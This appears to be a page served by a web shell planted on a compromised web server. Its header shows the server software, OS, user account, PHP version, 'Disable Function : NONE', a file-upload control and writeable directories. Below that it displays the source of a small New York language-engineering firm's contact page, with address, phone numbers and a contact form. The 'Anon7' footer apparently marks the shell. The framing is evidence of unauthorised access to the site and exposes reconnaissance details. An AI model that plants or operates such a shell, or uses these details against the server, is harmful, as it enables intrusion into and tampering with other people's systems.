KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/smartny/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/smartny/contact.html
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <title>Contact SMART Team USA</title>
  <meta name="description" content="">
  <meta name="keywords" content="">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Fonts -->
  <link href="https://fonts.googleapis.com" rel="preconnect">
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="assets/vendor/aos/aos.css" rel="stylesheet">
  <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">
  <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">

  <!-- Main CSS File -->
  <link href="assets/css/main.css" rel="stylesheet">

  <!-- =======================================================
  * Template Name: Eterna
  * Template URL: https://bootstrapmade.com/eterna-free-multipurpose-bootstrap-template/
  * Updated: Aug 07 2024 with Bootstrap v5.3.3
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body class="contact-page">

  <header id="header" class="header sticky-top">

    <div class="topbar d-flex align-items-center dark-background">
      <div class="container d-flex justify-content-center justify-content-md-between">
        <div class="contact-info d-flex align-items-center">
          <i class="bi bi-envelope d-flex align-items-center"><a href="mailto:[email protected]">[email protected]</a></i>
          <i class="bi bi-phone d-flex align-items-center ms-4"><span>+1(212) 486-1894 (EST -5UTC)</span></i>
        </div>
        <div class="social-links d-none d-md-flex align-items-center">
          <a href="#" class="twitter"><i class="bi bi-twitter-x"></i></a>        
          <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
        </div>
      </div>
    </div><!-- End Top Bar -->

    <div class="branding">

      <div class="container position-relative d-flex align-items-center justify-content-between">
        <a href="index.html" class="logo d-flex align-items-center">
          <!-- Uncomment the line below if you also wish to use an image logo -->
          <img src="assets/img/smart_logo2.jpg" alt="Smart Communications, Inc. New York">
        <!--  <h1 class="sitename">SMART Communications<br></h1> -->
        </a>


<nav id="navmenu" class="navmenu">
          <ul>
            <li><a href="index.html" class="active">Home</a></li>
            <li><a href="about.html">About</a></li>
            <li><a href="Services.html">SMART Services</a></li>
            <li><a href="software.html">SMART Software</a></li>
            <li><a href="support.html">Support</a></li>
            <li><a href="blog.html">Blog</a></li>
            <li><a href="contact.html">Contact</a></li>
          </ul>
          <i class="mobile-nav-toggle d-xl-none bi bi-list"></i>
        </nav>

      </div>
    </div>


<style type="text/css">
body{
	font-family:"Lucida Grande", "Lucida Sans Unicode", Verdana, Arial, Helvetica, sans-serif; 
	font-size:12px;
}
p, h1, form, button{border:0; margin:0; padding:0;}
.spacer{clear:both; height:1px;}
/* ----------- My Form ----------- */
.myform{
	margin:0 auto;
	width:400px;
	padding:14px;
       }
	/* ----------- basic ----------- */
	#basic{
		border:solid 2px #DEDEDE;	
	}
	#basic h1 {
		font-size:14px;
		font-weight:bold;
		margin-bottom:8px;
	}
	#basic p{
		font-size:11px;
		color:#666666;
		margin-bottom:20px;
		border-bottom:solid 1px #dedede;
		padding-bottom:10px;
	}
	#basic label{
		display:block;
		font-weight:bold;
		text-align:right;
		width:140px;
		float:left;
	}
	#basic .small{
		color:#666666;
		display:block;
		font-size:11px;
		font-weight:normal;
		text-align:right;
		width:140px;
	}
	#basic input{
		float:left;
		width:200px;
		margin:2px 0 30px 10px;
	}
	#basic button{ 
		clear:both;
		margin-left:150px;
		background:#888888;
		color:#FFFFFF;
		border:solid 1px #666666;
		font-size:11px;
		font-weight:bold;
		padding:4px 6px;
	}


	/* ----------- stylized ----------- */
	#stylized{
		border:solid 2px #b7ddf2;
		background:#ebf4fb;

	}
	#stylized h1 {
		font-size:14px;
		font-weight:bold;
		margin-bottom:8px;
	}
	#stylized p{
		font-size:11px;
		color:#666666;
		margin-bottom:20px;
		border-bottom:solid 1px #b7ddf2;
		padding-bottom:10px;
	}
	#stylized label{
		display:block;
		font-weight:bold;
		text-align:right;
		width:140px;
		float:left;
                padding-right: 10px;
	}
	#stylized .small{
		color:#666666;
		display:block;
		font-size:11px;
		font-weight:normal;
		text-align:right;
		width:140px;
                padding-right: 10px;
	}
	#stylized input{
		float:left;
		font-size:12px;
		padding:4px 2px;
		border:solid 1px #aacfe4;
		width:200px;
		margin:2px 0 20px 10px;
	}
	#stylized button{ 
		clear:both;
		margin-left:160px;
		width:125px;
		height:31px;
		background:#444;
		text-align:center;
		line-height:31px;
		color:#FFFFFF;
		font-size:11px;
		font-weight:bold;
	}
</style>


  </header>

  <main class="main">

    <!-- Page Title -->
    <div class="page-title" data-aos="fade">
      <div class="container">
        <nav class="breadcrumbs">
          <ol>
            <li><a href="index.html">Home</a></li>
            <li class="current">Contact SMART Team</li>
          </ol>
        </nav>
      <!--  <h1>Contact</h1> -->
      </div>
    </div><!-- End Page Title -->

   
    <!-- Contact Section -->
    <section id="contact" class="contact section">

     <div class="container" data-aos="fade-up" data-aos-delay="100">

        <div class="row gy-4">

          <div class="col-lg-6">
            <div class="info-item d-flex flex-column justify-content-center align-items-center" data-aos="fade-up" data-aos-delay="200">
              <i class="bi bi-geo-alt" style="color:cornflowerblue" width="2em"></i>
              <h3>Business Address</h3>
              <p>641 Lexington Ave, 13th Floor, New York, NY 10022 USA </br>
              (Enter on 54th St, at Lexington Ave., next to FedEx Office.)
              </p>
            </div>
          </div><!-- End Info Item -->

          <div class="col-lg-3 col-md-6">
            <div class="info-item d-flex flex-column justify-content-center align-items-center" data-aos="fade-up" data-aos-delay="300">
              <i class="bi bi-telephone" style="color:cornflowerblue"></i> 
              <h3>Telephone/Voice Mail</h3>                      
              <p>Tel: +1(212) 486-1894</p>
              <p>Fax: +1(212) 634-6311</p>
            </div>
          </div><!-- End Info Item -->

          <div class="col-lg-3 col-md-6">
            <div class="info-item d-flex flex-column justify-content-center align-items-center" data-aos="fade-up" data-aos-delay="400">
              <i class="bi bi-envelope" style="color:cornflowerblue" width="1em"></i>
            <h3>Email Contact</h3>
            <p><strong>Email:</strong> <span>info[@]smartny.com</span><br/>
            <strong>Email:</strong> <span>support[@]smartny.com</span></p>                     
            </div>
          </div><!-- End Info Item -->
     </div>

        <div class="row gy-4 mt-1">
          <div class="col-lg-6" data-aos="fade-up" data-aos-delay="300">
          
            <img src="assets/img/GoogleMap.jpg" width="570" height="396" alt="SmartMap" longdesc="assets/img/GoogleMap.jpg">         
            <div class="info-item d-flex flex-column justify-content-center align-items-center" data-aos="fade-up" data-aos-delay="400">
            <h3><i class="bi bi-people" style="color:cornflowerblue">&nbsp;&nbsp;Careers</i></h3>
            <p> 
            We welcome r&eacute;sum&eacute;s from future <b>SMART team</b> members with a demonstrated passion for 
            <b>language engineering</b>, <b>machine translation</b>, <b>text simplification</b> and <b>Artificial Intelligence</b>.  Send your
            r&eacute;sum&eacute; to maxit[@]smartny.com. Got an idea, question, comment
            or just want to chat, send a message or .pdf. We listen.
            </p>                     
          </div><!-- End Info Item -->
            </div><!-- End Google Maps -->
           
          <div class="col-lg-6">

<div id="stylized" class="myform">

<form id="form1" id="form1" action="contact.php" method="POST">

    <label>Name
        <span class="small">Add your name</span>
    </label>
<input type="text" name="name">
    <label>Email
        <span class="small">Enter your Email</span>
    </label>
<input type="text" name="email">

    <label>Company
        <span class="small">Company Name</span>
    </label>
<input type="text" name="company">


    <label>Website
        <span class="small">Enter Website</span>
    </label>
 <input type="text" name="website" padding-right: 15px;>
 
 
    <label><img src="assets/img/capture.png" width="99" height="32" alt="XXXX">
        <span class="small">Enter word above</span>
    </label>  
    <input type="text" name="capture" value="">
       
     
<br />
<br />

<label>Platform<span class="small">Select Platform</span></label>

<select name="platform" size="1" padding-right: 15px;>
<option value="FM">Adobe FrameMaker (FM-2022)</option>
<option value="PTC">PTC Arbortext Editor</option>
<option value="MSW">Microsoft Word</option>
<option value="OtherP">Other platforms</option>
</select>


<br />
<br />
<br />


    <label>Product or Service
    <span class="small">Select Product </span>
    </label>

 <select name="service" size="1">
<option value="MAX">MAXit Checker</option>
<option value="LEX">SMART Lexicon Manager</option>
<option value="STM">SMART Text Miner</option>
<option value="TMS">Text Mining Services</option>
<option value="TWS">Technical Writing</option>
<option value="PGM">Programming Services</option>
<option value="SAI">Dictionary AI Services</option>
<option value="OTHER">Other Services (enter below)</option>
</select>
 
 
<br />
<br />
<br />



    <label>Message
        <span class="small">Your Message</span>
    </label>
<textarea name="message" rows="6" cols="25"></textarea><br />

    <button type="submit" value="Send" style="margin-top:15px;">Submit</button>
    <button type="reset" value="Clear" style="margin-top:15px;">Clear</button>
<div class="spacer"></div>
</form>
</div>
              </div>


<!-- 
<div id="stylized" class="myform">
<form id="form1" id="form1" action="contact.php" method="POST">

<label>Name
<span class="small">Add your name</span>
</label>
<input type="text" name="name">

<label>Email
<span class="small">Enter your Email</span>
</label>
<input type="text" name="email">


<label>Company
<span class="small">Company Name</span>
</label>
<input type="text" name="company">

<br/>
<br/>

<label>Website
<span class="small">Company Website</span>
</label>
<input type="text" name="website">

<label>Platform  
<span class="small">Select your Platform </span>
</label>

<select name="platform" size="1">
<option value="FM">Adobe FrameMaker (FM-2022)</option>
<option value="PTC">PTC Arbortext Editor</option>
<option value="MSW">Microsoft Word</option>
<option value="OtherP">Other platforms</option>
</select>
<br />
<br />
<br />

    <label>Product or Service
    <span class="small">Select Product or Service </span>
    </label>
    
    <label>Word Test
     <span class="small">Reenter the word left.</span>
     </label>
     <input type="text" name="capture">


 <select name="service" size="1">
<option value="MAX">MAXit Checker</option>
<option value="LEX">SMART Lexicon Manager</option>
<option value="STM">SMART Text Miner</option>
<option value="TMS">Text Mining Services</option>
<option value="TWS">Technical Writing</option>
<option value="PGM">Programming Services</option>
<option value="SAI">Dictionary AI Services</option>
<option value="OTHER">Other Services (enter below)</option>
</select>
<br />
<br />
<br />
  
    <label>Message
        <span class="small">Describe your needs </span>
    </label>
     <textarea name="message" rows="6" cols="25"></textarea><br />

    <button type="submit" value="Send" style="margin-top:15px;">Submit</button>
   <div class="spacer"></div>
</form>




<!-- 
<div id="stylized" class="myform">
<form id="form1" id="form1" action="contact.php" method="POST">

<label>Name
<span class="small">Add your name</span>
</label>
<input type="text" name="name">

<label>Email
<span class="small">Enter your Email</span>
</label>
<input type="text" name="email">


<label>Company
<span class="small">Company Name</span>
</label>
<input type="text" name="company">
<br/>
<br/>

<label>Website
<span class="small">Company Website</span>
</label>
<input type="text" name="website">

<label>Platform  
<span class="small">Select your Platform </span>
</label>

<select name="platform" size="1">
<option value="FM">Adobe FrameMaker (FM-2022)</option>
<option value="PTC">PTC Arbortext Editor</option>
<option value="MSW">Microsoft Word</option>
<option value="OtherP">Other platforms</option>
</select>
<br />
<br />
<br />

    <label>Product or Service
    <span class="small">Select Product or Service </span>
    </label>
    
    <label>Word Test
     <span class="small">Reenter the word left.</span>
     </label>
     <input type="text" name="capture">


 <select name="service" size="1">
<option value="MAX">MAXit Checker</option>
<option value="LEX">SMART Lexicon Manager</option>
<option value="STM">SMART Text Miner</option>
<option value="TMS">Text Mining Services</option>
<option value="TWS">Technical Writing</option>
<option value="PGM">Programming Services</option>
<option value="SAI">Dictionary AI Services</option>
<option value="OTHER">Other Services (enter below)</option>
</select>
<br />
<br />
<br />
  
    <label>Message
        <span class="small">Describe your needs </span>
    </label>
     <textarea name="message" rows="6" cols="25"></textarea><br />

    <button type="submit" value="Send" style="margin-top:15px;">Submit</button>
   <div class="spacer"></div>
</form>

          </div><!-- End Contact Form -->

        </div>

      </div>

    </section><!-- /Contact Section -->
     
  </main>

  <footer id="footer" class="footer position-relative dark-background">

 <div class="container footer-top">
      <div class="row gy-4">
        <div class="col-lg-4 col-md-6 footer-about">
          <a href="index.html" class="d-flex align-items-center">

<p><h1 style="font-size: 16px"><b>Smart&nbsp;Communications&nbsp;Inc.</b></h1></p>
          </a>
          <div class="footer-contact pt-3">
            <p>641 Lexington Avenue, 13th Floor</p>
            <p>New York, NY 10022</p>
            <p class="mt-3">Tel: <span>+1(212)  486-1894</span></p>
            <p>Email Information: <span>info[@]smartny.com</span><br/>
             Email Support: <span>support[@]smartny.com</span></p>
          </div>
        </div>

 <div class="col-lg-2 col-md-3 footer-links">
          <h4>SMART Links</h4>
          <ul>
            <li><i class="bi bi-chevron-right"></i> <a href="index.html">Home</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="about.html">About us</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="Services.html">Services</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="Maxit.html">MAXit Software</a></li>
          </ul>
        </div>

        <div class="col-lg-2 col-md-3 footer-links">
          <h4>Our Services</h4>
          <ul>
            <li><i class="bi bi-chevron-right"></i> <a href="Services.html">Writer Training</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="Services.html">Technical Writing</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="Services.html">Text Mining Service</a></li>
            <li><i class="bi bi-chevron-right"></i> <a href="Services.html">AI Programming</a></li>
          </ul>
        </div>

  <div class="col-lg-4 col-md-12">
          <h4>Follow Us</h4>
          <p>Follow us on X for trends<br/>and LinkedIn for news.</p>
          <div class="social-links d-flex">
            <a href=""><i class="bi bi-twitter-x"></i></a>
            <a href=""><i class="bi bi-linkedin"></i></a>
          </div>
        </div>


      </div>
    </div>
     

<div class="container copyright text-center mt-4">
      <p>©2026 <strong class="px-1 sitename">Smart Communications, Inc.</strong> <span>All Rights Reserved</span></p>
     
        <time datetime="2020-01-01">Last Update:  June 1, 2026 | This site does not use cookies.</time>
    
    </div>

  </footer>

  <!-- Scroll Top -->
  <a href="#" id="scroll-top" class="scroll-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a>

  <!-- Preloader -->
  <div id="preloader"></div>

  <!-- Vendor JS Files -->
  <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
  <script src="assets/vendor/php-email-form/validate.js"></script>
  <script src="assets/vendor/aos/aos.js"></script>
  <script src="assets/vendor/swiper/swiper-bundle.min.js"></script>
  <script src="assets/vendor/purecounter/purecounter_vanilla.js"></script>
  <script src="assets/vendor/waypoints/noframework.waypoints.js"></script>
  <script src="assets/vendor/glightbox/js/glightbox.min.js"></script>
  <script src="assets/vendor/imagesloaded/imagesloaded.pkgd.min.js"></script>
  <script src="assets/vendor/isotope-layout/isotope.pkgd.min.js"></script>

  <!-- Main JS File -->
  <script src="assets/js/main.js"></script>

</body>

</html>

Anon7 - 2021